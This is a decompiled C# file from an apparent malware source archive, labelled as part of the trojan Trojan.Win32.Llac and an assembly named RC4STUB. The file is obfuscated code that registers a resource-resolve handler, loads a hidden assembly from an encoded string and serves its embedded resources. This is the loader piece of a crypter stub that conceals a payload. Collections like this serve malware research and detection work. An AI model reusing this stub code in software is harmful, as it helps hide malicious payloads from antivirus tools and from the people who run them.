MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6/_0002/_0002.cs
2022-08-18 06:28:56 -05:00

51 lines
1.4 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4bd99f8fe4adcd07
// MVID: DA5B8577-1DEE-425A-83B8-F58DDD172F9B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6.exe
using \u0001;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0002
{
internal class \u0002
{
private static Assembly \u0001 = (Assembly) null;
private static string[] \u0001 = new string[0];
internal static void \u0003()
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0002.\u0002.\u0003);
}
catch (Exception ex)
{
}
}
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0002.\u0002.\u0001 == null)
{
lock (\u0002.\u0002.\u0001)
{
\u0002.\u0002.\u0001 = Assembly.Load(\u0003.\u0003(222));
if ((object) \u0002.\u0002.\u0001 != null)
\u0002.\u0002.\u0001 = \u0002.\u0002.\u0001.GetManifestResourceNames();
}
}
string name = obj1.Name;
for (int index = 0; index < \u0002.\u0002.\u0001.Length; ++index)
{
if (\u0002.\u0002.\u0001[index] == name)
return \u0002.\u0002.\u0001;
}
return (Assembly) null;
}
}
}